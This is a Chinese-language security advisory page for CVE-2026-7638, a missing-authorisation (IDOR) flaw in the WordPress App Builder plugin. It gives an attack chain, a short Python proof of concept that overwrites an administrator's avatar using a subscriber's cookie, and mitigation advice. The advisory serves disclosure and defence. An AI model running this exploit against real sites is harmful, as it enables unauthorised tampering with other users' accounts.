CVE-2026-7638 CVSS 5.3 中危

CVE-2026-7638 WordPress App Builder IDOR漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7638

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress App Builder Plugin

漏洞概述

WordPress的App Builder插件在5.6.0及之前版本中存在不安全的直接对象引用（IDOR）漏洞。该漏洞源于`upload_avatar()`函数缺少授权验证，允许经过身份验证的攻击者（仅需订阅者权限）通过修改POST请求中的`user_id`参数，覆盖任意用户（包括管理员）的个人资料头像。

技术细节

该漏洞位于插件的REST API端点`/wp-json/app-builder/v1/upload-avatar`。漏洞核心在于`upload_avatar()`函数直接从POST请求体中获取攻击者控制的`user_id`参数，并利用该ID调用更新用户元数据的函数，未验证当前请求者是否拥有该目标账户的修改权限。尽管CVSS向量显示无需认证，但实际利用场景需要攻击者拥有一个有效的WordPress账户（权限最低为Subscriber）。攻击者利用此漏洞可篡改管理员头像，造成网站完整性受损。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标站点使用了WordPress App Builder插件（版本<=5.6.0）。

STEP 2

2. 获取低权限账户

攻击者在目标站点注册一个账户或获取一个低权限（Subscriber）账户的凭据。

STEP 3

3. 发送恶意请求

攻击者向`/wp-json/app-builder/v1/upload-avatar`端点发送POST请求，在请求体中将`user_id`参数设置为管理员的ID，并上传恶意图片。

STEP 4

4. 完成攻击

服务器端因缺少权限校验，直接将管理员的头像更新为攻击者上传的图片。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: WordPress App Builder IDOR Vulnerability
# Description: PoC to overwrite an arbitrary user's avatar.

url = "http://target-site.com/wp-json/app-builder/v1/upload-avatar"

# Attacker's cookies (Subscriber role)
cookies = {
    "wordpress_logged_in_xxx": "attacker_cookie_value"
}

# Target user ID (e.g., 1 for Administrator)
data = {
    "user_id": "1"
}

# Malicious image file to upload
files = {
    "file": ("hack.jpg", open("hack.jpg", "rb"), "image/jpeg")
}

response = requests.post(url, cookies=cookies, data=data, files=files)

if response.status_code == 200:
    print("[+] Exploit successful! Avatar updated.")
else:
    print("[-] Exploit failed.")

影响范围

App Builder <= 5.6.0

防御指南

临时缓解措施

建议立即将插件升级到修复该漏洞的版本。若暂时无法升级，应禁用该插件或通过服务器配置限制对`/wp-json/app-builder/v1/upload-avatar`端点的访问权限，直到应用补丁为止。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表